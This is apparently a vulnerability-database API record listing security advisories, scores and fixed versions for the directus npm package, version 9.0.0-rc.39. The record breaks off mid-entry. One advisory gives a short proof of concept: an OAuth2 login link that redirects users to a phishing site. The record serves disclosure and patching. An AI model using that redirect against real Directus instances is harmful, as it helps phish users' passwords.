{"url":"http://public2.vulnerablecode.io/api/packages/523695?format=json","purl":"pkg:npm/directus@9.0.0-rc.39","type":"npm","namespace":"","name":"directus","version":"9.0.0-rc.39","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"11.17.0","latest_non_vulnerable_version":"11.17.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15447?format=json","vulnerability_id":"VCID-1hn2-pjm6-dyhj","summary":"Duplicate\nThis advisory duplicates another.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-26969","reference_id":"","reference_type":"","scores":[{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76152","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-26969"},{"reference_url":"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system"
:"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md"},{"reference_url":"https://github.com/directus/directus/pull/12022","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/pull/12022"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.7.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.7.0"},{"reference_url":"https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/"}],"url":"https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26969","reference_id":"CVE-2022-26969","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/
A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-26969"},{"reference_url":"https://github.com/advisories/GHSA-g27j-74fp-xfpr","reference_id":"GHSA-g27j-74fp-xfpr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g27j-74fp-xfpr"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr","reference_id":"GHSA-g27j-74fp-xfpr","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60235?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3cgw-zr3k-3fen"},{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8r4e-a1vf-9bd9"},{"vulnerability":"VCID-9gba-zszk-p3h6"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-ejme-tqn4-byhk"},{"vulnerability":"VCID-et4m-8y15-9fb9"},{"vulnerability":"VCID-eygf-cb4y-hqd3"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gjju-tu4e-gqfc"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-hrqc-8err-4fbx"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VC
ID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-szny-2sbf-v7de"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-v4vz-smcx-gygb"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-26969","GHSA-g27j-74fp-xfpr","GMS-2022-677"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1hn2-pjm6-dyhj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19657?format=json","vulnerability_id":"VCID-3cgw-zr3k-3fen","summary":"Session Token in URL in directus\n### Impact\n\nWhen reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user.\n\n### Patches\n\n_Has the problem been patched? 
What versions should users upgrade to?_\n\n### Workarounds\n\nThere's no workaround available.\n\n### References\n\n_Are there any links users can visit to find out more?_","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28238","reference_id":"","reference_type":"","scores":[{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.2556","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28238"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28238","reference_id":"CVE-2024-28238","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28238"},{"reference_url":"https://github.com/advisories/GHSA-2ccr-g2rv-h677","reference_id":"GHSA-2ccr-g2rv-h677","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2ccr-g2rv-h677"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677","reference_id":"GHSA-2ccr-g2rv-h677","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:50:33Z/"}],"url":"https:/
/github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68163?format=json","purl":"pkg:npm/directus@10.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8uym-xka8-cybb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0"}],"aliases":["CVE-2024-28238","GHSA-2ccr-g2rv-h677"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://publ
ic2.vulnerablecode.io/vulnerabilities/VCID-3cgw-zr3k-3fen"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330172?format=json","vulnerability_id":"VCID-3kmj-b584-9ubg","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35412","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02565","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35412"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T16:23:08Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35412","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35412"},{"reference_url":"https://github.com/advisories/GHSA-qqmv-5p3g-px89","reference_id":"GHSA-qqmv-5p3g-px89","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elemen
ts":""}],"url":"https://github.com/advisories/GHSA-qqmv-5p3g-px89"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188455?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35412","GHSA-qqmv-5p3g-px89"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3kmj-b584-9ubg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330196?format=json","vulnerability_id":"VCID-5qx9-76s2-6qfw","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35442","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04967","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35442"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","sco
ring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T13:30:05Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35442","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35442"},{"reference_url":"https://github.com/advisories/GHSA-38hg-ww64-rrwc","reference_id":"GHSA-38hg-ww64-rrwc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-38hg-ww64-rrwc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35442","GHSA-38hg-ww64-rrwc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5qx9-76s2-6qfw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20791?format=json","vulnerability_id":"VCID-7zt3-dcnm-hqfb","summary":"Directus has Improper Permission Handling on Deleted Fields\nDirectus does not properly clean up field-level permissions when a field is deleted. 
If a new field with the same name is created later, the system automatically re-applies the old permissions, which can lead to unauthorized access.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64746","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12679","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64746"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/"}],"url":"https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64746","reference_id":"CVE-2025-64746","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64746"},{"reference_url":"https://github.com/advisories/GHSA-9x5g-62gj-wqf2","reference_id":"GHSA-9x5g-62gj-wqf2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9x5g-62gj-wqf2"},{"
reference_url":"https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2","reference_id":"GHSA-9x5g-62gj-wqf2","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70180?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64746","GHSA-9x5g-62gj-wqf2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7zt3-dcnm-hqfb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19659?format=json","vulnerability_id":"VCID-8r4e-a1vf-9bd9","summary":"URL Redirection to Untrusted Site in OAuth2/OpenID in directus\n### Summary\nThe authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL 
https://docs.directus.io/reference/authentication.html#login-using-sso-providers /auth/login/google?redirect for example.\n\n### Details\nThere's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`, which I think is here: https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L394. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like an error message \"Your password needs to be updated\" to phish out the current password.\n\n### PoC\nTurn on any auth provider in Directus instance. Form a link to `directus-instance/auth/login/:provider_id?redirect=http://malicious-fishing-site.com`, log in and get taken to malicious-site. Tested on the `ory` OAuth2 integration.\n\n### Impact\nUsers who log in via OAuth2 into Directus.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28239","reference_id":"","reference_type":"","scores":[{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.45793","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28239"},{"reference_url":"https://docs.directus.io/reference/authentication.html#login-using-sso-providers","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://docs.directus.io/reference/authentication.html#login-using-sso-providers"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28239","reference_id":"CVE-2024-28239","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28239"},{"reference_url":"https://github.com/advisories/GHSA-fr3w-2p22-6w7p","reference_id":"GHSA-fr3w-2p22-6w7p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fr3w-2p22-6w7p"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p","reference_id":"GHSA-fr3w-2p22-6w7p","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7
p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/68163?format=json","purl":"pkg:npm/directus@10.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-8uym-xka8-cybb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-eb8p-vqjt-yfb8"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"},{"vulnerability":"VCID-yz34-qwam-wbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0"}],"aliases":["CVE-2024-28239","GHSA-fr3w-2p22-6w7p"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8r4e-a1vf-9bd9"},{"url":"
